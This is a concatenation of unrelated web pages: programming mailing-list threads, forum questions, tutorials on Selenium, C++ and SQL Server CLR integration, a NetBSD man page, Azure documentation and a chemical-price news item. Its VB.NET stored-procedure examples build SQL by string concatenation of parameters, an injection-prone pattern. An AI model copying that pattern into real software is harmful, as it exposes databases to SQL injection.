I thought Windows' SetUnhandledExceptionFilter could handle this, but I was wrong.

Anthony Williams-3 wrote:
>> At the very least, I see a value in not behaving worse than if the
>> associated client thread had spawned its own worker thread. That is:
>> std::launch_in_pool(&crashing_function);
>> should not behave worse than
>> std::thread t(&crashing_function);
> It doesn't: it crashes the application in both cases ;-)

You're right. Deadlocks will however be able to "spread" in this non-obvious way. Let's say thread C1 adds task T1 to the pool, which is processed by worker thread W1. C1 then blocks until T1 is finished. When T1 waits on a future, it starts working on job T2, which deadlocks. This deadlock now spreads to the uninvolved thread C1 too. I don't know how much of a problem this is though - effective thread re-use might be worth more than this unexpected behaviour.

Anthony Williams-3 wrote:
> If it was a large list, I wouldn't /just/ do a timed_wait on each future in
> turn. The sleep here lacks expression of intent, though. I would write a
> dynamic wait_for_any like so:
>
> void wait_for_any(const vector<future<void>>& futures)
> {
>     while (1)
>     {
>         for (...f in futures...)
>         {
>             for (...g in futures...) if (g.is_ready()) return;
>             if (f.timed_wait(1ms)) return;
>         }
>     }
> }
>
> That way, you're never just sleeping: you're always waiting on a future.
> Also, you share the wait around, but you still check each one every time
> you wake.

Maybe you would, but I doubt most users would. I wouldn't expect that waiting on a future expresses interest in the value.
Anthony Williams-3 wrote:
> You're right: if there's lots of futures, then you can consume considerable
> CPU time polling them, even if you then wait/sleep. What is needed is a
> mechanism to say "this future belongs to this set" and "wait for one of
> the set".

Exactly my thoughts. Wait for all would probably be needed too. And to build composites, you need to be able to add both futures and these future-sets to a future-set. Might be one class for wait_for_any and another one for wait_for_all.

Anthony Williams-3 wrote:
> Currently, I can imagine doing this by spawning a separate thread for
> each future in the set, which then does a blocking wait on its future and
> notifies a "combined" value when done. The other threads in the set can
> then be interrupted when one is done. Of course, you need /really/
> lightweight threads to make that worthwhile, but I expect threads to
> become cheaper as the number of cores increases.

Starting a thread to wait for a future doesn't seem very suitable to me. Imagine 10% of the core threads each waiting on (combinatorial) results from the remaining 90%. Also, waiting on many futures is probably applicable even on single-core processors. For instance, if you have 100s of pending requests to different types of distributed services, you could model each request with a future and be interested in the first response which arrives. Windows threads today aren't particularly light-weight. This might mean that condition_variable isn't a suitable abstraction to build futures on :( At least not the way it works today. But I don't think it's a good idea to change condition_variables this late. It is a pretty widespread, well-working and well-understood concurrency model. OTOH changing future's waiting model this late is not good either.

Anthony Williams-3 wrote:
> Alternatively, you could do it with a completion-callback, but I'm not
> entirely comfortable with that.
I'm not comfortable with this either, for the reasons I expressed in my response to Gaskill's proposal. This issue is my biggest concern with the future proposal. The alternatives I've seen so far:

1. Change/alter condition variables
2. Add a future-complete callback (Gaskill's proposal)
3. Implement wait_for_many with a thread per future
4. Implement wait_for_many with periodic polling with timed_waits
5. Introduce a new wait_for_many mechanism (public class or implementation details)
6. Don't ever support waiting on multiple futures
7. Don't support it until the next version, but make sure we don't need to alter future semantics/interface when adding it.

Alternative 7 blocks the possibility to write some exciting libraries on top of futures until a new future version is available. Do you have further alternatives?

Johan
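The "wait for one of the set" primitive debated in this thread later became standard library material in several languages. Purely to illustrate the intended semantics (this sketches no Boost interface), Python's concurrent.futures exposes it directly:

```python
from concurrent.futures import ThreadPoolExecutor, wait, FIRST_COMPLETED
import time

def job(delay, value):
    time.sleep(delay)
    return value

with ThreadPoolExecutor(max_workers=3) as pool:
    # Three futures form the "set"; we block until any one of them is ready.
    futures = [pool.submit(job, d, v)
               for d, v in [(0.5, "slow"), (0.01, "fast"), (0.4, "mid")]]
    done, pending = wait(futures, return_when=FIRST_COMPLETED)
    # No polling loop and no one-thread-per-future: completion wakes the waiter.
    print(sorted(f.result() for f in done))
```

This is essentially alternative 5 from the list above: a separate wait mechanism over a set, rather than a change to futures or condition variables themselves.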
https://lists.boost.org/Archives/boost/2008/05/137366.php
19 April 2011 22:02 [Source: ICIS news] HOUSTON (ICIS)--The local polyethylene (PE) producer in Chile plans to raise PE prices by $100/tonne in May.

Dow's measure was based on rising costs of feedstock ethylene in international markets and also on the general lack of alternatives.

Before the proposed May increase, low density PE (LDPE) prices in Chile were in the range of $1,965-2,117/tonne DEL (delivered), based on ICIS data. Prices for small-volume buyers were likely to be even higher. Product from the US Gulf would likely arrive at $1,960-1,980/tonne CFR (cost and freight) Chile main port.

It was not clear if the proposed $100/tonne price increase would take hold partially or in full. Market players said the behaviour of ethylene prices in the coming week would make or break this initiative.
http://www.icis.com/Articles/2011/04/19/9453954/chile-pe-prices-to-rise-100tonne-in-may-on-higher-feedstock-costs.html
import org.netbeans.modules.j2ee.api.ejbjar.Car;
import org.openide.filesystems.FileObject;

/**
 * Provider interface for application client (car) modules.
 * <p>
 * The <code>org.netbeans.modules.j2ee.ejbapi</code> module registers an
 * implementation of this interface to global lookup which looks for the
 * project which owns a file (if any) and checks its lookup for this interface,
 * and if it finds an instance, delegates to it. Therefore it is not normally
 * necessary for a project type provider to register its own instance just to
 * define the application client (car) module for files it owns, assuming it
 * uses projects for implementation of application client (car) module.
 * </p>
 * <p>If needed a new implementation of this interface can be registered in
 * global lookup.
 * </p>
 * @see Car#getCar
 *
 * @author Pavel Buzek
 * @author Lukas Jungmann
 */
public interface CarProvider {

    /**
     * Find a carmodule containing a given file.
     * @param file a file somewhere
     * @return a carmodule, or null for no answer
     * @see CarFactory
     */
    Car findCar(FileObject file);

}
http://kickjava.com/src/org/netbeans/modules/j2ee/spi/ejbjar/CarProvider.java.htm
Dear Community, I have a simple workflow where the reporter needs to fill in an Excel sheet. Ideally the transition from status A to B will send an email with this sheet as an attachment to the reporter. Any ideas how to achieve this? Maybe with ScriptRunner? Best would be without any other plugins. Thanks in advance. Kristian

Hello @Access Microfinance Holding AG, you can use the ScriptRunner post-function on this transition called "Send custom email"; there is an option to include attachments added during this transition.

Thanks @Mark Markov, this helps me at least with customizing the email even further, but where can I upload the attachment? It seems this area is for setting rules only, like allowing .pdf uploads only or restricting the file size. What I want to achieve, for example, is that I press the transition action and a custom email with an attachment X is sent automatically. The reporter then needs to fill in this attachment, re-upload it, and done. Thanks in advance. Kristian

In this case, for example, you can attach this Excel file to the issue and create a custom callback that will attach files with a given name:

import com.onresolve.scriptrunner.canned.jira.workflow.postfunctions.MailAttachment

{MailAttachment a -> a.filename.toLowerCase().equals("exeltofill.xls")}

Hi @Access Microfinance Holding AG, if I'm not wrong (and I often am) I'd say you need a custom ScriptRunner email script, or you could use the Email This Issue add-on: JETI can send out recent attachments. Regarding the archiving: what do you mean by that? A solution without add-ons: you would have to redirect the user to your Jira issue and open up your Jira to the public. Let me know if this helps somewhat and what your additional thoughts are. Cheers, Krisz

For ScriptRunner itself, it looks like the custom email function is for configuring attachment rules only, or I am missing the simple "upload attachment" button. :) Yes, you are right: to add an attachment as a comment, for example, and just inform the user could also be an option. Looks like this is the way to go for me. Thanks for helping out, which I appreciate. Best, Krist.
Create Apache Kafka enabled event hubs

Azure Event Hubs is a Big Data streaming Platform as a Service (PaaS) that ingests millions of events per second and provides low latency and high throughput for real-time analytics and visualization. This article describes how to create an Event Hubs namespace and get the connection string required to connect Kafka applications to Kafka-enabled event hubs.

Prerequisites

If you do not have an Azure subscription, create a free account before you begin.

Create a Kafka enabled Event Hubs namespace

1. Sign in to the Azure portal, and click Create a resource at the top left of the screen.
2. Provide a unique name and enable Kafka on the namespace. Click Create.
3. Once the namespace is created, on the Settings tab click Shared access policies to get the connection string. You can choose the default RootManageSharedAccessKey, or add a new policy. Click the policy name and copy the connection string.
4. Add this connection string to your Kafka application configuration.

You can now stream events from your applications that use the Kafka protocol into Event Hubs.

Next steps

To learn more about Event Hubs, visit these links:
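As a sketch of what "add this connection string to your Kafka application configuration" typically looks like for a Kafka client: the namespace name mynamespace is a placeholder, the port is 9093, the SASL username is the literal string $ConnectionString, and the password is the connection string copied in the step above (illustrative only; check the values against your own namespace):

```properties
bootstrap.servers=mynamespace.servicebus.windows.net:9093
security.protocol=SASL_SSL
sasl.mechanism=PLAIN
sasl.jaas.config=org.apache.kafka.common.security.plain.PlainLoginModule required \
  username="$ConnectionString" \
  password="Endpoint=sb://mynamespace.servicebus.windows.net/;SharedAccessKeyName=RootManageSharedAccessKey;SharedAccessKey=<key>";
```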
https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-create-kafka-enabled
SHMCTL(2) NetBSD System Calls Manual SHMCTL(2)

NAME
     shmctl -- shared memory control operations

LIBRARY
     Standard C Library (libc, -lc)

SYNOPSIS
     #include <sys/shm.h>

     int shmctl(int shmid, int cmd, struct shmid_ds *buf);

DESCRIPTION
     The shmctl() system call performs control operations on the shared
     memory segment specified by shmid. Each shared memory segment has a
     shmid_ds structure associated with it which contains the following
     members:

         struct ipc_perm shm_perm;   /* operation permissions */
         size_t          shm_segsz;  /* size of segment in bytes */
         pid_t           shm_lpid;   /* pid of last shm op */
         pid_t           shm_cpid;   /* pid of creator */
         shmatt_t        shm_nattch; /* # of current attaches */
         time_t          shm_atime;  /* last shmat() time */
         time_t          shm_dtime;  /* last shmdt() time */
         time_t          shm_ctime;  /* last change by shmctl() */

     The ipc_perm structure used inside the shmid_ds structure is defined in
     <sys/ipc.h>. The operation to be performed by shmctl() is specified in
     cmd and is one of:

     IPC_STAT    Gather information about the shared memory segment and
                 place it in the structure pointed to by buf.

     IPC_SET     Set the value of the shm_perm.uid, shm_perm.gid and
                 shm_perm.mode fields in the structure associated with shmid.
                 The values are taken from the corresponding fields in the
                 structure pointed to by buf. This operation can only be
                 executed by the super-user, or a process that has an
                 effective user id equal to either shm_perm.cuid or
                 shm_perm.uid in the data structure associated with the
                 shared memory segment.

     IPC_RMID    Remove the shared memory segment specified by shmid and
                 destroy the data associated with it. Only the super-user or
                 a process with an effective uid equal to the shm_perm.cuid
                 or shm_perm.uid values in the data structure associated with
                 the segment can do this.

     SHM_LOCK    Lock the shared memory segment specified by shmid in
                 memory. This operation can only be executed by the
                 super-user.

     SHM_UNLOCK  Unlock the shared memory segment specified by shmid.
This operation can only be executed by the super-user. The read and write permissions on a shared memory identifier are deter- mined by the shm_perm.mode field in the same way as is done with files (see chmod(2)), but the effective uid can match either the shm_perm.cuid field or the shm_perm.uid field, and the effective gid can match either shm_perm.cgid or shm_perm.gid. RETURN VALUES Upon successful completion, a value of 0 is returned. Otherwise, -1 is returned and the global variable errno is set to indicate the error. ERRORS shmctl() will fail if: [EACCES] The command is IPC_STAT and the caller has no read permission for this shared memory segment. [EFAULT] buf specifies an invalid address. [EINVAL] shmid is not a valid shared memory segment identifier. cmd is not a valid command. [ENOMEM] The cmd is equal to SHM_LOCK and there is not enough physical memory. [EPERM] cmd is equal to IPC_SET or IPC_RMID and the caller is not the super-user, nor does the effective uid match either the shm_perm.uid or shm_perm.cuid fields of the data structure associated with the shared memory seg- ment. An attempt was made to increase the value of shm_qbytes through IPC_SET but the caller is not the super-user. The cmd is equal to SHM_LOCK or SHM_UNLOCK and the caller is not the super-user. SEE ALSO ipcrm(1), ipcs(1), shmat(2), shmget(2) STANDARDS The shmctl system call conforms to X/Open System Interfaces and Headers Issue 5 (``XSH5''). HISTORY Shared memory segments appeared in the first release of AT&T System V UNIX. NetBSD 9.99 November 25, 2006 NetBSD 9.99
http://man.netbsd.org/shmctl.2
Getting Started with Selenium and Python

I thought I'd have a look at Selenium today. Here are my notes from my first outing.

Selenium

Selenium is a functional testing framework which automates the browser to perform certain operations which in turn test the underlying actions of your code. It comes in a number of different versions:

Available Components

Selenium Core
    The core HTML and JavaScript files which you can install on your server to program Selenium directly. No-one really uses these.

Selenium IDE
    A Firefox plugin which embeds Selenium Core into Firefox so that you don't need to install it on your server. It also provides a nice GUI for recording and re-playing tests as well as exporting them as Python code (and other formats) so that they can be used with Selenium RC.

Selenium RC (Remote Control)
    This is a server which can be controlled (via HTTP as it happens) to send Selenium commands to the browser. This effectively allows you to control a browser remotely from your ordinary Python test suite. The RC server also bundles Selenium Core, and automatically loads it into the browser.

Selenium Grid
    This allows you to run your Selenium tests on multiple different browsers in parallel.

We will use Selenium IDE with Firefox and Selenium RC.

Selenium IDE

Now would be a great time to watch the introductory video at to understand how Selenium IDE works. It is only a minute or two long and explains how everything works with a demo much better than I could with words.

Now you've seen the video it's time to create and run your own test. Here's what you need to do:

- Download and install Selenium IDE from . It is a .xpi file which will be installed as a Firefox plugin.
- Start the IDE by clicking Tools -> Selenium IDE from the menu.
- Recording will have started automatically so perform some actions. For this first example, try searching for something in Google, follow a link and then perform some more actions on the site you arrive at. Then press the record button to stop.
- Press the play all tests button to see the actions re-performed.
- Choose Options -> Format -> Python to see a Selenium RC test suite written in Python which will re-perform those actions. Save the Test Case as First Test and save the Python as first_test.py.

Although the Selenium IDE you've just used to record your tests only works in Firefox, the tests it produces can be used with Selenium RC to run tests in most modern JavaScript browsers.

Selenium RC

The Selenium RC server is written in Java even though it can be controlled from many languages. To run it you will need a recent version of Java installed. Here's how to install it on Debian/Ubuntu:

    sudo apt-get install openjdk-6-jdk

Now download the latest version from and run these commands to install it:

    unzip selenium-remote-control-1.0-beta-2-dist.zip
    cd selenium-remote-control-1.0-beta-2
    cd selenium-server-1.0-beta-2
    java -jar selenium-server.jar

The options for the server are documented at:

If you visit you'll see some of the tests. You can run these automatically with these commands with the server still running:

    cd selenium-remote-control-1.0-beta-2
    cd selenium-python-client-driver-1.0-beta-2
    python test_default_server.py

This will take a few seconds to load some browser windows and then output the following to show that the test passed:

    Using selenium server at localhost:4444
    .
    ----------------------------------------------------------------------
    Ran 1 test in 18.695s

    OK

There will be plenty of output on the Selenium RC server's console explaining what it is up to. Now try running the script you saved earlier. You'll need to copy the selenium.py file from selenium-remote-control-1.0-beta-2/selenium-python-client-driver-1.0-beta-2 into the same directory as first_test.py and then run this:

    python first_test.py

You'll see the following error output after 3 seconds:

    E
    ======================================================================
    ERROR: test_new (__main__.NewTest)
    ----------------------------------------------------------------------
    Traceback (most recent call last):
      File "first_test.py", line 12, in test_new
        sel.open("/")
      File "/home/james/Desktop/GRP/code/trunk/GRP/test/selenium.py", line 764, in open
        self.do_command("open", [url,])
      File "/home/james/Desktop/GRP/code/trunk/GRP/test/selenium.py", line 215, in do_command
        raise Exception, data
    Exception: Timed out after 30000ms
    ----------------------------------------------------------------------
    Ran 1 test in 44.308s

    FAILED (errors=1)

This is because you need to specify the URL where Selenium should start its testing. Ordinarily Selenium can't test across multiple domains so the domain you start at is the only one which can be tested. Selenium is able to work around this limitation in certain browsers such as Firefox and IE as you can read about at

Since we are using Firefox, Selenium RC can test multiple domains at once but it still needs to be given the URL to start at. Since the test you performed in the Selenium IDE section started at you should change the URL to in the code. If you run the test again you should see Selenium repeat all the actions and this time confirm the output was a success:

    .
    ----------------------------------------------------------------------
    Ran 1 test in 37.098s

    OK

If you want to examine the windows which pop up during the tests, just add these lines to the end of the test_new() method to make the test wait for 10 seconds after it has been run:

    import time
    time.sleep(10)

You can now remote control the browser from Python which means you can perform other tasks in-between the tests you are running. For example, you might want to remove all data from your test database before the tests are run.

To test your code in a different browser you would change this line:

    self.selenium = selenium("localhost", 4444, "*chrome", "")

To something like this:

    self.selenium = selenium(
        "localhost",
        4444,
        "c:\\program files\\internet explorer\\iexplore.exe",
        ""
    )

Happy testing.

- Selenium Website:
- Python Documentation:
https://www.jimmyg.org/blog/2009/getting-started-with-selenium-and-python.html
It is used to get/set the stream buffer. If sb is a null pointer, the function automatically sets the badbit error state flags (which may throw an exception if member exceptions has been passed badbit).

Some derived stream classes (such as stringstream and fstream) maintain their own internal stream buffer, to which they are associated on construction. Calling this function to change the associated stream buffer shall have no effect on that internal stream buffer: the stream will have an associated stream buffer which is different from its internal stream buffer (although input/output operations on streams always use the associated stream buffer, as returned by this member function).

Following is the declaration for the ios::rdbuf function.

    get (1)    streambuf* rdbuf() const;
    set (2)    streambuf* rdbuf (streambuf* sb);

The first form (1) returns a pointer to the stream buffer object currently associated with the stream. The second form (2) also sets the object pointed to by sb as the stream buffer associated with the stream and clears the error state flags.

Parameters

sb − Pointer to a streambuf object.

Return Value

A pointer to the stream buffer object associated with the stream before the call.

Exception Safety

Basic guarantee − if an exception is thrown, the stream is in a valid state. It throws an exception of member type failure if sb is a null pointer and member exceptions was set to throw for badbit.

Data Races

Accesses (1) or modifies (2) the stream object. Concurrent access to the same stream object may cause data races.

Example

The example below demonstrates the ios::rdbuf function.

    #include <iostream>
    #include <fstream>

    int main () {
       std::streambuf *psbuf, *backup;
       std::ofstream filestr;
       filestr.open ("test.txt");

       backup = std::cout.rdbuf();   // back up cout's streambuf
       psbuf = filestr.rdbuf();      // get the file's streambuf
       std::cout.rdbuf(psbuf);       // assign it to cout

       std::cout << "This is written to the file";

       std::cout.rdbuf(backup);      // restore cout's original streambuf
       filestr.close();
       return 0;
    }
https://www.tutorialspoint.com/cpp_standard_library/cpp_ios_rdbuf.htm
Hi Michael,

sorry for being late in the discussion.

Am 10.05.2012 um 10:28 schrieb Michael J Gruber:

> r3151 took into account the direction already but missed the fact that
> arrows are positioned wrt. the constriction center now. Make it so that
> a reversed arrow is positioned wrt. the constriction center also.

To my understanding this is not true. Everything is completely symmetric. For earrows, at pos=0, the "back" of the arrow starts at the starting point of the path and at pos=1 (the default for earrow) the tip is at the end. The same for barrow. At pos=1 the back is at the end of the path and at pos=0 (the default for barrow) the tip is at the beginning. Those limits are correct. In between we're just going linearly.

I'm sorry, your circular example is much too complicated for me. Here's my attempt:

    from pyx import *

    c = canvas.canvas()
    c.stroke(path.line(0, 0, 10, 0))
    c.stroke(path.line(0, 0, 0, 2))
    c.stroke(path.line(0.1, 0, 0.1, 2))
    c.stroke(path.line(5, 0, 5, 2))
    c.stroke(path.line(9.9, 0, 9.9, 2))
    c.stroke(path.line(10, 0, 10, 2))
    c.stroke(path.line(0, 0.2, 10, 0.2), [deco.arrow(pos=1)]) # earrow
    c.stroke(path.line(0, 0.4, 10, 0.4), [deco.arrow(pos=1, reversed=1)])
    c.stroke(path.line(0, 0.6, 10, 0.6), [deco.arrow(pos=0.99)])
    c.stroke(path.line(0, 0.8, 10, 0.8), [deco.arrow(pos=0.99, reversed=1)])
    c.stroke(path.line(0, 1.0, 10, 1.0), [deco.arrow(pos=0.5)])
    c.stroke(path.line(0, 1.2, 10, 1.2), [deco.arrow(pos=0.5, reversed=1)])
    c.stroke(path.line(0, 1.4, 10, 1.4), [deco.arrow(pos=0.01)])
    c.stroke(path.line(0, 1.6, 10, 1.6), [deco.arrow(pos=0.01, reversed=1)])
    c.stroke(path.line(0, 1.8, 10, 1.8), [deco.arrow(pos=0)])
    c.stroke(path.line(0, 2.0, 10, 2.0), [deco.arrow(pos=0, reversed=1)]) # barrow
    c.writePDFfile()

Now try your patches. It creates a lot of confusion. No way. I think the positioning of the arrows on the circle you're trying to get right should be done using path features. This is trivial:

    from pyx import *
    c = canvas.canvas()
    circ = path.circle(0, 0, 5)
    p = path.line(0, 0, 5, 5)
    c.stroke(circ.split(circ.intersect(p)[0][0])[0], [deco.arrow(size=1)])
    c.stroke(p)
    c.writePDFfile()

Now, the only problem is if you want to position the "back of the arrow" at the intersection point. I don't know whether it is that useful (technically) but I fully understand that it might be desirable from a visual point of view sometimes. You need to take into account the constriction length of the arrow in question. Unfortunately this was not accessible from the outside. I just checked in a simple patch (changeset 3247). Then it becomes a simple modification of what we had before:

    from pyx import *
    c = canvas.canvas()
    circ = path.circle(0, 0, 5)
    p = path.line(0, 0, 5, 5)
    a = deco.arrow(size=1)
    c.stroke(circ.split(circ.intersect(p)[0][0] + a.constrictionlen)[0], [a])
    c.stroke(p)
    c.writePDFfile()

Best,

André

--
by  _ _      _    Dr. André Wobst, Amselweg 22, 85716 Unterschleißheim
   / \ \    / )   wobsta@...,
  / _ \ \/\/ /    PyX - High quality PostScript and PDF figures
 (_/ \_)_/\_/     with Python & TeX: visit
http://sourceforge.net/p/pyx/mailman/pyx-devel/?viewmonth=201205&viewday=21
Hello, i have this code:

    import saito.objloader.*;

    OBJModel model;
    OBJModel tmpmodel;
    PVector[] PVArray;
    float rotX, rotY;
    float k = 0.0;

    void setup() {
      size(800, 600, P3D);
      frameRate(30);
      model = new OBJModel(this, "Model2.obj", "absolute", TRIANGLES);
      model.enableDebug();
      model.scale(100);
      model.translateToCenter();
      tmpmodel = new OBJModel(this, "Model2.obj", "absolute", TRIANGLES);
      tmpmodel.enableDebug();
      tmpmodel.scale(100);
      tmpmodel.translateToCenter();
      frameRate(100);
      stroke(255);
      noStroke();
    }

    void draw() {
      background(129);
      lights();
      translate(width/2, height/2, 0);
      //rotX += 0.1;
      rotY += 0.01;
      //rotateX(rotX);
      //rotateY(rotY);
      pushMatrix();
      for (int i = 0; i < model.getVertexCount(); i++) {
        PVector orgv = model.getVertex(i);
        PVector tmpv = new PVector();
        PVArray[i] = new PVector();
        //tmpv.x = mouseY;
        //tmpv.y = mouseY;
        println(orgv);
        tmpv.x = orgv.x * (i*mouseX);
        tmpv.y = orgv.y + (i*0.01);
        tmpv.z = orgv.z;
        tmpmodel.setVertex(i, tmpv);
      }
      k += 0.01;
      popMatrix();
      tmpmodel.draw();
    }

I have a problem with the model.getVertex(i) function. I want to make an array of the PVectors that it gets, so I can manipulate them individually with custom functions, and not as a whole object. Do you have any idea? Or do you think it's better to use PShapeObj? Thanks in advance.

Answers

hello again, i made the sketch with an arraylist, but it keeps storing the variable i as one element of the arraylist that pass all the vertices. Any help please.

Cross-posted: Seems similar to the for ( ; ; ) loop logical problem from:

yeah i know, i did it because sometimes here noone answers

i will check it

i did this and worked perfect until now, no null pointer exception

    pushMatrix();

hello again, i did this. The array works, but when i printArray(Verts) it returns null; when i println(model.getVertex(i)), i get the PVectors. if i declare the array as a global variable and then populate it in the for loop like this

    Verts[i] = model.getVertex(i);

i get a null pointer exception. vertCount is 12738.

hello again, i proceeded the sketch to this. Is there any way to iterate through the array of PVectors and make them have autonomous movement, because now it moves only the whole object. I want to make the vertices act like particles.
https://forum.processing.org/two/discussion/comment/73738/
hi, i was implementing strstr() to see how it works.

Code:

    #include <iostream>
    #include <cstring>  // declares strstr()

    using namespace std;

    int main()
    {
        char str[] = "this is a test";
        char *s;
        s = strstr(str, "test");
        cout << s << endl;
        return 0;
    }

i have two questions.

question 1 > what is the full form of strstr()? for example, if i write strcpy ---> it means string copy. similarly what is the meaning of strstr()? the syntaxes don't give the full form of this function. can you tell what is the literal meaning?

question 2 > without assigning memory (by the new keyword) the code is running!! look, i have simply tested with only char *s; but no memory allocated.
https://cboard.cprogramming.com/c-programming/51771-strstr-question.html
SQL Server "Yukon" and the CLR: Using Server Data

Using the SqlContext Object

When you install SQL Server "Yukon", it includes an assembly with the System.Data.SqlServer namespace. This is the in-process managed provider: a new ADO.NET provider whose task it is to communicate back from the CLR to SQL Server. But it doesn't communicate with just any SQL Server (there's already System.Data.SqlClient for that). Instead, when you load CLR code into Yukon (by declaring it as an assembly), the in-process managed provider lets you connect directly to the server that's hosting your code. You can use this to retrieve data from the server or to send data to the server. Here's a simple first example, in the form of a user-defined function that uses data from the server instance that calls it:

    Imports System.Data.SqlServer
    Imports System.Data.Sql

    Namespace NorthwindExtras
        Public Class Products
            <SqlFunction(DataAccess:=DataAccessKind.Read)> _
            Public Shared Function InventoryValue( _
              ByVal ProductID As Integer) As Double
                ' Create a SqlCommand object pointing at the parent database
                Dim cmd As SqlCommand = SqlContext.GetCommand()
                cmd.CommandType = CommandType.Text
                cmd.CommandText = "SELECT UnitsInStock * UnitPrice " & _
                  "FROM Products WHERE ProductID = " & CStr(ProductID)
                ' Execute the command and return the result
                InventoryValue = CDbl(cmd.ExecuteScalar())
            End Function
        End Class
    End Namespace

If you've used ADO.NET to work with SQL Server in the past, this code should look very familiar to you. The key difference is that this code doesn't use a SqlConnection object. Instead, it starts its work with the SqlContext object, which you can think of as a SqlConnection that points directly back to the calling database. In this case, I've used the SqlContext object to give me a SqlCommand, and then executed a SELECT statement in that command. The results are used as the value of the function. After compiling the assembly, I can use it within SQL Server "Yukon" like this (refer to the first article in the series for more details):

    CREATE ASSEMBLY NorthwindExtras
    FROM 'C:\NorthwindExtras\bin\NorthwindExtras.dll'
    GO

    CREATE FUNCTION InventoryValue(@ProductID INT)
    RETURNS FLOAT
    EXTERNAL NAME NorthwindExtras:[NorthwindExtras.Products]::InventoryValue
    GO

    SELECT dbo.InventoryValue(1)
    GO

    ----------------------
    702

    (1 row(s) affected)

Note that these statements need to be run in the Northwind sample database to work, because the VB .NET code is expecting to find one of the Northwind tables when it calls back through the SqlContext object.

Using the SqlPipe Object

A second important object is the SqlPipe object. This is the key to sending data back to SQL Server "Yukon" from your CLR code. You can think of the SqlPipe object as something like the ASP.NET Response object; anything you drop into the SqlPipe comes out the other end in the calling T-SQL code. For example, to write a stored procedure in the CLR, you use a SqlPipe object to transmit the results back to the server. I'll add a second member to the Products class to demonstrate how this works, with a few extras thrown in for good measure:

    <SqlMethod()> _
    Public Shared Sub GetProspects(ByVal State As String)
        ' Set up a pipeline for the stored procedure results
        Dim sp As SqlPipe = SqlContext.GetPipe()
        ' Connect to a different SQL Server database
        Dim cnn As System.Data.SqlClient.SqlConnection = _
          New System.Data.SqlClient.SqlConnection
        cnn.ConnectionString = _
          "Data Source=(local);Initial Catalog=pubs;Integrated Security=SSPI"
        cnn.Open()
        ' Retrieve some data
        Dim cmd As System.Data.SqlClient.SqlCommand = cnn.CreateCommand()
        cmd.CommandText = "SELECT au_fname + ' ' + au_lname AS Prospect " & _
          "FROM authors WHERE state = '" & State & "'"
        Dim dr As System.Data.SqlClient.SqlDataReader = cmd.ExecuteReader()
        ' And return the results
        sp.Send(dr)
        cnn.Close()
    End Sub

This code introduces a few new things. First, there's the SqlMethod attribute, which tells Yukon to treat this member as a stored procedure (assuming that it's properly registered on the database side of things). The SqlPipe object comes directly from the SqlContext object, giving the code a pipeline back to the calling database. But in this particular case, I'm also opening a connection to another database. Note that I'm using objects in the System.Data.SqlClient namespace for this, and that I have to use their fully-qualified names so that the compiler knows I'm using the standard SQL Server provider rather than the in-process provider. At the end of the procedure, I call the Send method of the SqlPipe object to send the results back to the calling T-SQL code. The Send method has several overloads; it can accept a string, a SqlError object, or an object that implements ISqlReader or ISqlRecord. In this case, the standard SqlDataReader class implements ISqlReader.

Registering and using this stored procedure looks like this:

    CREATE ASSEMBLY NorthwindExtras
    FROM 'C:\NorthwindExtras\bin\NorthwindExtras.dll'
    WITH PERMISSION_SET = EXTERNAL_ACCESS
    GO

    CREATE PROCEDURE GetProspects (@State nvarchar(2))
    AS EXTERNAL NAME NorthwindExtras:[NorthwindExtras.Products]::GetProspects
    GO

    GetProspects 'CA'
    GO

    varchar
    -------------------------------------------------------------
    Johnson White
    Marjorie Green
    Cheryl Carson
    Michael O'Leary
    Dean Straight
    Abraham Bennet
    Ann Dull
    Burt Gringlesby
    Charlene Locksley
    Akiko Yokomoto
    Dirk Stringer
    Stearns MacFeather
    Livia Karsen
    Sheryl Hunter
    Heather McBadden

    (15 row(s) affected)

You'll see that I've added an extra clause to the CREATE ASSEMBLY statement here. By default, an assembly registered with SQL Server "Yukon" doesn't have permission to use resources outside of the local database instance. This will block any use of the System.Data.SqlClient namespace (among many other operations). By using WITH PERMISSION_SET = EXTERNAL_ACCESS, I'm telling SQL Server "Yukon" that I want to allow the assembly to access external resources. There's also another version, WITH PERMISSION_SET = UNSAFE, for running code that can't be verified; you should reserve this for very exceptional circumstances because it could represent a large security hole. The CREATE PROCEDURE statement is very similar to CREATE FUNCTION. After creating the procedure, I can just run it, like any other stored procedure.

Looking Forward

As always with new code, there's the question of where you might actually want to use this stuff. I've already discussed some of the reasons you might want to move procedures to managed code: speed and complexity, for example, or access to resources outside of SQL Server. What catches my eye in these examples is the SqlPipe object, and its ability to return anything that implements IDataReader. Implementing an interface is pretty simple in .NET (and it will get even easier in Visual Studio .NET "Whidbey"), so this gives us the ability to return just about any data as the results of a SQL Server stored procedure. Imagine a result set of Registry keys, or Active Directory objects, or IIS log file records, or...well...just about anything that you could represent in rows and columns. I don't think anyone knows exactly what CLR code will be used for in production deployments of SQL Server "Yukon," but with the flexibility and power of this connection I'm sure the results will be interesting indeed.
http://www.developer.com/db/article.php/3289101
Errors can be broadly categorized into two types. We will discuss them one by one.

Compile Time Errors – Errors caught at compile time are called compile time errors. Compile time errors include missing library references, syntax errors or incorrect class imports.

Run Time Errors – They are also known as exceptions. An exception caught during run time creates serious issues.

Errors hinder the normal execution of a program. Exception handling is the process of handling errors and exceptions in such a way that they do not hinder the normal execution of the system. For example, if the user divides a number by zero, this will compile successfully but an exception or run time error will occur, due to which our application will crash. In order to avoid this, we introduce exception handling techniques in our code.

In C++, error handling is done using three keywords: try, catch and throw.

Syntax:

    try
    {
        //code
        throw parameter;
    }
    catch(exceptionname ex)
    {
        //code to handle exception
    }

try block

The code which can throw any exception is kept inside (or enclosed in) a try block. Then, when the code leads to any error, that error/exception will get caught inside the catch block.

catch block

The catch block is intended to catch the error and handle the exception condition. We can have multiple catch blocks to handle different types of exceptions and perform different actions when the exceptions occur. For example, we can display descriptive messages to explain why any particular exception occurred.

throw statement

It is used to throw exceptions to the exception handler, i.e. it is used to communicate information about the error. A throw expression accepts one parameter, and that parameter is passed to the handler. The throw statement is used when we explicitly want an exception to occur; then we can use a throw statement to throw or generate that exception.

Let's take a simple example to understand the usage of try, catch and throw. The program below compiles successfully, but fails at runtime, leading to an exception:

    #include <iostream>

    using namespace std;

    int main()
    {
        int a = 10, b = 0, c;
        c = a/b;    // division by zero: runtime error
        return 0;
    }

The above program will not run, and will show a runtime error on screen, because we are trying to divide a number by 0, which is not possible.

How to handle this situation? We can handle such situations using exception handling and can inform the user that you cannot divide a number by zero, by displaying a message.

try, catch and throw statements

Now we will update the above program and include exception handling in it:

    #include <iostream>

    using namespace std;

    int main()
    {
        int a = 10, b = 0, c;
